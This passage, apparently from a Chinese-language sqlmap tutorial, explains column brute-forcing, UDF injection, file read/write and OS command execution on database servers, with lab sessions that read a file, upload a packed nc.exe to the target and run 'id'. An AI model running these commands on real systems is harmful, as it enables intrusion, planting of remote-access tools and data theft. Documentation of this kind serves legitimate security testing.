style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">please&nbsp;enter&nbsp;number&nbsp;of&nbsp;threads?&nbsp;[Enter&nbsp;for&nbsp;1&nbsp;(current)]&nbsp;8<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier 
New';\">[hh:mm:43]&nbsp;[INFO]&nbsp;retrieved:&nbsp;users<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Database:&nbsp;testdb<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[1&nbsp;table]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&#8212;&#8212;-+<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;users&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&#8212;&#8212;-+<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E5%88%97%E5%90%8D\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u66b4\u529b\u7834\u89e3\u5217\u540d<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;common-columns<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New 
Roman';\">\u4e0e\u66b4\u529b\u7834\u89e3\u8868\u540d\u4e00\u6837\uff0c\u66b4\u529b\u8dd1\u7684\u5217\u540d\u5728<span>txt\/common-columns.txt<\/span><span>\u4e2d\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h2><span class=\"ez-toc-section\" id=\"%E7%94%A8%E6%88%B7%E8%87%AA%E5%AE%9A%E4%B9%89%E5%87%BD%E6%95%B0%E6%B3%A8%E5%85%A5\"><\/span>\n\t<span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\">\u7528\u6237\u81ea\u5b9a\u4e49\u51fd\u6570\u6ce8\u5165<\/span><span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p class=\"p0\">\n\t<span style=\"font-size:10.5000pt;font-family:'Times New Roman';\">&nbsp;<\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>--udf-inject,--shared-lib<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4f60\u53ef\u4ee5\u901a\u8fc7\u7f16\u8bd1<span>MySQL<\/span><span>\u6ce8\u5165\u4f60\u81ea\u5b9a\u4e49\u7684\u51fd\u6570\uff08<\/span><span>UDFs<\/span><span>\uff09\u6216<\/span><span>PostgreSQL<\/span><span>\u5728<\/span><span>windows<\/span><span>\u4e2d\u5171\u4eab\u5e93\uff0c<\/span><span>DLL<\/span><span>\uff0c\u6216\u8005<\/span><span>Linux\/Unix<\/span><span>\u4e2d\u5171\u4eab\u5bf9\u8c61\uff0c<\/span><span>sqlmap<\/span><span>\u5c06\u4f1a\u95ee\u4f60\u4e00\u4e9b\u95ee\u9898\uff0c\u4e0a\u4f20\u5230\u670d\u52a1\u5668\u6570\u636e\u5e93\u81ea\u5b9a\u4e49\u51fd\u6570\uff0c\u7136\u540e\u6839\u636e\u4f60\u7684\u9009\u62e9\u6267\u884c\u4ed6\u4eec\uff0c\u5f53\u4f60\u6ce8\u5165\u5b8c\u6210\u540e\uff0c<\/span><span>sqlmap<\/span><span>\u5c06\u4f1a\u79fb\u9664\u5b83\u4eec\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times 
New Roman';\"><\/span>\n<\/p>\n<h2><span class=\"ez-toc-section\" id=\"%E7%B3%BB%E7%BB%9F%E6%96%87%E4%BB%B6%E6%93%8D%E4%BD%9C\"><\/span>\n\t<span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\">\u7cfb\u7edf\u6587\u4ef6\u64cd\u4f5c<\/span><span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p class=\"p0\">\n\t<span style=\"font-size:10.5000pt;font-family:'Times New Roman';\">&nbsp;<\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E4%BB%8E%E6%95%B0%E6%8D%AE%E5%BA%93%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%B8%AD%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u4ece\u6570\u636e\u5e93\u670d\u52a1\u5668\u4e2d\u8bfb\u53d6\u6587\u4ef6<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;file-read<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53\u6570\u636e\u5e93\u4e3a<span>MySQL<\/span><span>\uff0c<\/span><span>PostgreSQL<\/span><span>\u6216<\/span><span>Microsoft&nbsp;SQL&nbsp;Server<\/span><span>\uff0c\u5e76\u4e14\u5f53\u524d\u7528\u6237\u6709\u6743\u9650\u4f7f\u7528\u7279\u5b9a\u7684\u51fd\u6570\u3002\u8bfb\u53d6\u7684\u6587\u4ef6\u53ef\u4ee5\u662f\u6587\u672c\u4e5f\u53ef\u4ee5\u662f\u4e8c\u8fdb\u5236\u6587\u4ef6\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New 
Roman';\">\u5217\u4e3e\u4e00\u4e2a<span>Microsoft&nbsp;SQL&nbsp;Server&nbsp;2005<\/span><span>\u7684\u4f8b\u5b50\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/192.168.136.129\/sqlmap\/mssql\/iis\/get_str2.asp?name=luther&#8221;&nbsp;\\<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&#8211;file-read&nbsp;&#8220;C:\/example.exe&#8221;&nbsp;-v&nbsp;1<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:49]&nbsp;[INFO]&nbsp;the&nbsp;back-end&nbsp;DBMS&nbsp;is&nbsp;Microsoft&nbsp;SQL&nbsp;Server<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">web&nbsp;server&nbsp;operating&nbsp;system:&nbsp;Windows&nbsp;2000<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">web&nbsp;application&nbsp;technology:&nbsp;ASP.NET,&nbsp;Microsoft&nbsp;IIS&nbsp;6.0,&nbsp;ASP<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">back-end&nbsp;DBMS:&nbsp;Microsoft&nbsp;SQL&nbsp;Server&nbsp;2005<\/span><span class=\"16\" 
style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:50]&nbsp;[INFO]&nbsp;fetching&nbsp;file:&nbsp;&#8216;C:\/example.exe&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:50]&nbsp;[INFO]&nbsp;the&nbsp;SQL&nbsp;query&nbsp;provided&nbsp;returns&nbsp;3&nbsp;entries<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">C:\/example.exe&nbsp;file&nbsp;saved&nbsp;to:&nbsp;&nbsp;&nbsp;&nbsp;&#8216;\/software\/sqlmap\/output\/192.168.136.129\/files\/C__example.exe&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;ls&nbsp;-l&nbsp;output\/192.168.136.129\/files\/C__example.exe&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">-rw-r&#8211;r&#8211;&nbsp;1&nbsp;inquis&nbsp;inquis&nbsp;2560&nbsp;2011-MM-DD&nbsp;hh:mm&nbsp;output\/192.168.136.129\/files\/C__example.exe<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier 
New';\">$&nbsp;file&nbsp;output\/192.168.136.129\/files\/C__example.exe&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">output\/192.168.136.129\/files\/C__example.exe:&nbsp;PE32&nbsp;executable&nbsp;for&nbsp;MS&nbsp;Windows&nbsp;(GUI)&nbsp;Intel<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">80386&nbsp;32-bit<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E6%8A%8A%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%88%B0%E6%95%B0%E6%8D%AE%E5%BA%93%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%B8%AD\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u628a\u6587\u4ef6\u4e0a\u4f20\u5230\u6570\u636e\u5e93\u670d\u52a1\u5668\u4e2d<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;file-write,&#8211;file-dest<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53\u6570\u636e\u5e93\u4e3a<span>MySQL<\/span><span>\uff0c<\/span><span>PostgreSQL<\/span><span>\u6216<\/span><span>Microsoft&nbsp;SQL&nbsp;Server<\/span><span>\uff0c\u5e76\u4e14\u5f53\u524d\u7528\u6237\u6709\u6743\u9650\u4f7f\u7528\u7279\u5b9a\u7684\u51fd\u6570\u3002\u4e0a\u4f20\u7684\u6587\u4ef6\u53ef\u4ee5\u662f\u6587\u672c\u4e5f\u53ef\u4ee5\u662f\u4e8c\u8fdb\u5236\u6587\u4ef6\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span 
style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5217\u4e3e\u4e00\u4e2a<span>MySQL<\/span><span>\u7684\u4f8b\u5b50\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;file&nbsp;\/software\/nc.exe.packed&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">\/software\/nc.exe.packed:&nbsp;PE32&nbsp;executable&nbsp;for&nbsp;MS&nbsp;Windows&nbsp;(console)&nbsp;Intel&nbsp;80386&nbsp;32-bit<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;ls&nbsp;-l&nbsp;\/software\/nc.exe.packed<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">-rwxr-xr-x&nbsp;1&nbsp;inquis&nbsp;inquis&nbsp;31744&nbsp;2009-MM-DD&nbsp;hh:mm&nbsp;\/software\/nc.exe.packed<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/192.168.136.129\/sqlmap\/mysql\/get_int.aspx?id=1&#8221;&nbsp;&#8211;file-write&nbsp;\\<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&#8220;\/software\/nc.exe.packed&#8221;&nbsp;&#8211;file-dest&nbsp;&#8220;C:\/WINDOWS\/Temp\/nc.exe&#8221;&nbsp;-v&nbsp;1<\/span><span class=\"16\" 
style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:29]&nbsp;[INFO]&nbsp;the&nbsp;back-end&nbsp;DBMS&nbsp;is&nbsp;MySQL<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">web&nbsp;server&nbsp;operating&nbsp;system:&nbsp;Windows&nbsp;2003&nbsp;or&nbsp;2008<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">web&nbsp;application&nbsp;technology:&nbsp;ASP.NET,&nbsp;Microsoft&nbsp;IIS&nbsp;6.0,&nbsp;ASP.NET&nbsp;2.0.50727<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">back-end&nbsp;DBMS:&nbsp;MySQL&nbsp;&gt;=&nbsp;5.0.0<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">do&nbsp;you&nbsp;want&nbsp;confirmation&nbsp;that&nbsp;the&nbsp;file&nbsp;&#8216;C:\/WINDOWS\/Temp\/nc.exe&#8217;&nbsp;has&nbsp;been&nbsp;successfully&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier 
New';\">written&nbsp;on&nbsp;the&nbsp;back-end&nbsp;DBMS&nbsp;file&nbsp;system?&nbsp;[Y\/n]&nbsp;y<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:52]&nbsp;[INFO]&nbsp;retrieved:&nbsp;31744<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:52]&nbsp;[INFO]&nbsp;the&nbsp;file&nbsp;has&nbsp;been&nbsp;successfully&nbsp;written&nbsp;and&nbsp;its&nbsp;size&nbsp;is&nbsp;31744&nbsp;bytes,&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">same&nbsp;size&nbsp;as&nbsp;the&nbsp;local&nbsp;file&nbsp;&#8216;\/software\/nc.exe.packed&#8217;<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E8%BF%90%E8%A1%8C%E4%BB%BB%E6%84%8F%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u8fd0\u884c\u4efb\u610f\u64cd\u4f5c\u7cfb\u7edf\u547d\u4ee4<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;os-cmd,&#8211;os-shell<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New 
Roman';\">\u5f53\u6570\u636e\u5e93\u4e3a<span>MySQL<\/span><span>\uff0c<\/span><span>PostgreSQL<\/span><span>\u6216<\/span><span>Microsoft&nbsp;SQL&nbsp;Server<\/span><span>\uff0c\u5e76\u4e14\u5f53\u524d\u7528\u6237\u6709\u6743\u9650\u4f7f\u7528\u7279\u5b9a\u7684\u51fd\u6570\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5728<span>MySQL<\/span><span>\u3001<\/span><span>PostgreSQL<\/span><span>\uff0c<\/span><span>sqlmap<\/span><span>\u4e0a\u4f20\u4e00\u4e2a\u4e8c\u8fdb\u5236\u5e93\uff0c\u5305\u542b\u7528\u6237\u81ea\u5b9a\u4e49\u7684\u51fd\u6570\uff0c<\/span><span>sys_exec()<\/span><span>\u548c<\/span><span>sys_eval()<\/span><span>\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u90a3\u4e48\u5b83\u521b\u5efa\u7684\u8fd9\u4e24\u4e2a\u51fd\u6570\u53ef\u4ee5\u6267\u884c\u7cfb\u7edf\u547d\u4ee4\u3002\u5728<span>Microsoft&nbsp;SQL&nbsp;Server<\/span><span>\uff0c<\/span><span>sqlmap<\/span><span>\u5c06\u4f1a\u4f7f\u7528<\/span><span>xp_cmdshell<\/span><span>\u5b58\u50a8\u8fc7\u7a0b\uff0c\u5982\u679c\u88ab\u7981\uff08\u5728<\/span><span>Microsoft&nbsp;SQL&nbsp;Server&nbsp;2005<\/span><span>\u53ca\u4ee5\u4e0a\u7248\u672c\u9ed8\u8ba4\u7981\u7528\uff09\uff0c<\/span><span>sqlmap<\/span><span>\u4f1a\u91cd\u65b0\u542f\u7528\u5b83\uff0c\u5982\u679c\u4e0d\u5b58\u5728\uff0c\u4f1a\u81ea\u52a8\u521b\u5efa\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5217\u4e3e\u4e00\u4e2a<span>PostgreSQL<\/span><span>\u7684\u4f8b\u5b50\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span 
class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/192.168.136.131\/sqlmap\/pgsql\/get_int.php?id=1&#8221;&nbsp;\\<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&#8211;os-cmd&nbsp;id&nbsp;-v&nbsp;1<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">web&nbsp;application&nbsp;technology:&nbsp;PHP&nbsp;5.2.6,&nbsp;Apache&nbsp;2.2.9<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">back-end&nbsp;DBMS:&nbsp;PostgreSQL<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:12]&nbsp;[INFO]&nbsp;fingerprinting&nbsp;the&nbsp;back-end&nbsp;DBMS&nbsp;operating&nbsp;system<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:12]&nbsp;[INFO]&nbsp;the&nbsp;back-end&nbsp;DBMS&nbsp;operating&nbsp;system&nbsp;is&nbsp;Linux<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:12]&nbsp;[INFO]&nbsp;testing&nbsp;if&nbsp;current&nbsp;user&nbsp;is&nbsp;DBA<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier 
New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:12]&nbsp;[INFO]&nbsp;detecting&nbsp;back-end&nbsp;DBMS&nbsp;version&nbsp;from&nbsp;its&nbsp;banner<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:12]&nbsp;[INFO]&nbsp;checking&nbsp;if&nbsp;UDF&nbsp;&#8216;sys_eval&#8217;&nbsp;already&nbsp;exist<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:12]&nbsp;[INFO]&nbsp;checking&nbsp;if&nbsp;UDF&nbsp;&#8216;sys_exec&#8217;&nbsp;already&nbsp;exist<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:12]&nbsp;[INFO]&nbsp;creating&nbsp;UDF&nbsp;&#8216;sys_eval&#8217;&nbsp;from&nbsp;the&nbsp;binary&nbsp;UDF&nbsp;file<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:12]&nbsp;[INFO]&nbsp;creating&nbsp;UDF&nbsp;&#8216;sys_exec&#8217;&nbsp;from&nbsp;the&nbsp;binary&nbsp;UDF&nbsp;file<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">do&nbsp;you&nbsp;want&nbsp;to&nbsp;retrieve&nbsp;the&nbsp;command&nbsp;standard&nbsp;output?&nbsp;[Y\/n\/a]&nbsp;y<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">command&nbsp;standard&nbsp;output:&nbsp;&nbsp;&nbsp;&nbsp;&#8216;uid=104(postgres)&nbsp;gid=106(postgres)&nbsp;groups=106(postgres)&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier 
New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:19]&nbsp;[INFO]&nbsp;cleaning&nbsp;up&nbsp;the&nbsp;database&nbsp;management&nbsp;system<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">do&nbsp;you&nbsp;want&nbsp;to&nbsp;remove&nbsp;UDF&nbsp;&#8216;sys_eval&#8217;?&nbsp;[Y\/n]&nbsp;y<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">do&nbsp;you&nbsp;want&nbsp;to&nbsp;remove&nbsp;UDF&nbsp;&#8216;sys_exec&#8217;?&nbsp;[Y\/n]&nbsp;y<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:23]&nbsp;[INFO]&nbsp;database&nbsp;management&nbsp;system&nbsp;cleanup&nbsp;finished<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:23]&nbsp;[WARNING]&nbsp;remember&nbsp;that&nbsp;UDF&nbsp;shared&nbsp;object&nbsp;files&nbsp;saved&nbsp;on&nbsp;the&nbsp;file&nbsp;system&nbsp;can&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">only&nbsp;be&nbsp;deleted&nbsp;manually<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span 